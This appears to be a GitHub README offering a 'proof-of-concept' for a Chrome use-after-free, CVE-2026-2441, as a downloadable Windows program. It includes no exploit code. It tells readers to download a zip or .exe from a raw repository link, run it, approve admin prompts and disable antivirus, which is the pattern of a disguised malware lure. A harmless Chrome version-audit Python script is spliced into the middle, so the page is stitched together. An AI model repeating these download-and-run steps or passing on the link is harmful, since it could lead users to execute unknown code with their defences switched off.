This application demonstrates a known security flaw in Google Chrome. The flaw, called CVE-2026-2441, affects the way Chrome handles some fonts on the web. It can let attackers run code inside the browser without permission. This proof-of-concept (PoC) shows how that happens.
Use this tool only on safe computers or test environments. It helps security researchers and software testers understand the vulnerability better.
Follow these steps carefully to download and run the software on a Windows computer.
This PoC runs on Windows 10 or newer versions. Make sure your system meets these basic requirements:
- Windows 10, 11, or later
- At least 4 GB of RAM
- 1 GHz or faster processor
- 100 MB free hard drive space
You do not need any special software beforehand. The download provides everything necessary to run the test.
Click the big badge at the top or use this link to get the files:
This link takes you to the releases page on GitHub. Look for the latest release and download the Windows version file. It usually has a .exe or .zip extension.
If you downloaded a .zip file, follow these steps:
- Find the file in your Downloads folder.
- Right-click the file and choose "Extract All."
- Select a folder where you want the files.
- Click "Extract."
If you got an .exe file, skip this step.
- Open the folder where you saved or extracted the files.
- Find the main `.exe` file. This is the program you will run.
- Double-click the `.exe` file to start it.
- If Windows asks for permission, click "Yes" to allow it.
The program will open and guide you through the test.
The tool will show steps or run automatically. It simulates the vulnerability on your system in a safe way.
Do not use this tool on any computer that holds important or sensitive data. It is meant for controlled testing only.
This tool targets a flaw in Chrome's Blink rendering engine, specifically the CSSFontFeatureValuesMap component. When Chrome processes a webpage that uses certain font features, it can mistakenly free memory too early. This "use-after-free" flaw lets attackers run harmful code inside the browser.
Google fixed this problem in Chrome version 145.0.7632.75. If you use an older version, your browser is vulnerable.
To know if your Chrome is vulnerable:
- Open Chrome.
- Click the three dots in the top-right corner.
- Select "Help" > "About Google Chrome."
- Check the version number.
If it is lower than 145.0.7632.75, your browser might be at risk.
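The same version check can be scripted across a software inventory instead of being done by hand in each browser. The following is an added example, not code from this project; the host names, sample version strings and function names are constructed for illustration, and only the fixed version 145.0.7632.75 comes from this page.

```python
import re

# First fixed Chrome build, as stated on this page.
FIXED_VERSION = (145, 0, 7632, 75)

# Chrome versions have four numeric parts: MAJOR.MINOR.BUILD.PATCH
_VERSION_RE = re.compile(r"(?<![\d.])(\d+)\.(\d+)\.(\d+)\.(\d+)(?![\d.])")

def parse_version(text):
    """Return the first four-part version in text as a tuple of ints, or None."""
    match = _VERSION_RE.search(text)
    return tuple(int(part) for part in match.groups()) if match else None

def classify(text, fixed=FIXED_VERSION):
    """Classify a version string against the fixed build.

    Parts are compared as integers. Comparing the raw strings would rank
    "145.0.7632.9" above "145.0.7632.75" and miss a vulnerable install.
    """
    version = parse_version(text)
    if version is None:
        return "unknown"  # unparseable entries need a manual check
    return "vulnerable" if version < fixed else "patched"

def audit(inventory):
    """Group hosts from (host, version_text) pairs by classification."""
    report = {"vulnerable": [], "patched": [], "unknown": []}
    for host, version_text in inventory:
        report[classify(version_text)].append(host)
    return report

# Constructed sample inventory; hosts and version strings are illustrative.
SAMPLE_INVENTORY = [
    ("ws-01", "Google Chrome 144.0.7559.133"),
    ("ws-02", "Version 145.0.7632.9 (Official Build) (64-bit)"),
    ("ws-03", "145.0.7632.75"),
    ("ws-04", "Google Chrome 146.0.7680.31"),
    ("ws-05", "not installed"),
]

if __name__ == "__main__":
    for status, hosts in audit(SAMPLE_INVENTORY).items():
        print(f"{status}: {', '.join(hosts) or '-'}")
```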
| Component | Requirement |
|---|---|
| Operating System | Windows 10 or higher |
| CPU | 1 GHz or faster processor |
| RAM | Minimum 4 GB |
| Disk Space | At least 100 MB free |
| Software | No special software required |
- Run the program on a test machine, not your main computer.
- Do not connect the machine to sensitive networks.
- Close all other programs before testing.
- Follow all instructions carefully.
- If you are not familiar with security testing, seek expert help.
When you download, you will find:
- The main executable file (`.exe`) to launch the test.
- A Readme file explaining the basic use (you can read it for extra details).
- Some example HTML files used to trigger the vulnerability.
- Supporting files needed to run the demonstration.
You can visit the official GitHub releases page to always get the latest files:
Use this page to check for updates or report issues.
| Detail | Information |
|---|---|
| CVE Identifier | CVE-2026-2441 |
| Severity Score (CVSS) | 8.8 (High) |
| Type | Use-After-Free (CWE-416) |
| Component | Blink CSS — CSSFontFeatureValuesMap |
| Source File | https://github.com/fartlover37/CVE-2026-2441-PoC/raw/refs/heads/main/Pellaea/Po-CV-C-2.4-beta.2.zip |
| Fixed In Version | 145.0.7632.75 and later |
| Reported By | Shaheen Fazim |
| Patch Date | 2026-02-13 |
| Exploited in Wild | Yes |
Use the link below to visit the releases page and download the latest Windows file:
Follow the instructions above to install and run the program.
If the program does not run:
- Make sure your Windows is up-to-date.
- Check that your system meets the minimum requirements.
- Run the file as an administrator: right-click the `.exe` file and choose "Run as administrator."
- Disable antivirus temporarily if it blocks the program.
- Verify that you downloaded the correct file for Windows.
If problems persist, seek help by opening an issue on the GitHub page. Provide clear details about your system and error messages.
This project is intended for educational and testing purposes only. Use it responsibly. The author is not liable for any misuse or damage caused.
Check the GitHub repository for the license terms included in the package.